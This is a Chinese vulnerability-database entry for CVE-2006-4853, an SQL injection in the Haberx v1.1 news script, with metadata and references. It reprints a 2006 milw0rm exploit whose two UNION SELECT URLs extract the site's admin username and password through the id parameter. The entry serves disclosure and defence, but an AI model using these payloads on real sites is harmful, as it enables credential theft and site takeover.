Haberx 'kategorix.asp' SQL注入漏洞

QQ空间 新浪微博 微信 QQ facebook twitter
漏洞ID 1111048 漏洞类型 SQL注入
发布时间 2006-09-15 更新时间 2006-09-20
CVE编号 CVE-2006-4853 CNNVD-ID CNNVD-200609-299
漏洞平台 ASP CVSS评分 7.5
|漏洞来源
https://www.exploit-db.com/exploits/2371
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200609-299
|漏洞详情
Haberx的kategorix.asp中存在SQL注入漏洞,远程攻击者可以通过kategorihaberx.asp中的id参数执行任意SQL命令。
|漏洞EXP
+++++++++++++++++++++++++++++++++++++++++++++++++++
+ Haberx v1.1 (tr) SQL Injection Vulnerability    +
+ Author  : Fix TR                                +
+ Site    : www.hack.gen.tr                       +
+ Contact : fixtr[at]bsdmail.com                  +
+++++++++++++++++++++++++++++++++++++++++++++++++++

+ Download: http://www.aspindir.com/Goster/3983
+ Versions: 1.02 between 1.1
+ Bug In  : kategorix.asp
+ Risk    : High


+ Admin Nick:
http://[target]/[path]/kategorihaberx.asp?id=13+union+select+1,uyex_adi,1+from+uyex+where+uyex_id=1

+ Admin Password: (Big Letters)
http://[target]/[path]/kategorihaberx.asp?id=13+union+select+1,uyex_sifre,1+from+uyex+where+uyex_id=1

# milw0rm.com [2006-09-15]
|参考资料

来源:XF
名称:haberx-kategori-sql-injection(28988)
链接:http://xforce.iss.net/xforce/xfdb/28988
来源:BID
名称:20038
链接:http://www.securityfocus.com/bid/20038
来源:MILW0RM
名称:2371
链接:http://www.milw0rm.com/exploits/2371
来源:VUPEN
名称:ADV-2006-3661
链接:http://www.frsirt.com/english/advisories/2006/3661
来源:SECUNIA
名称:21960
链接:http://secunia.com/advisories/21960
来源:MISC
链接:http://packetstorm.linuxsecurity.com/0609-exploits/haberx.txt
来源:MILW0RM
名称:2371
链接:http://milw0rm.com/exploits/2371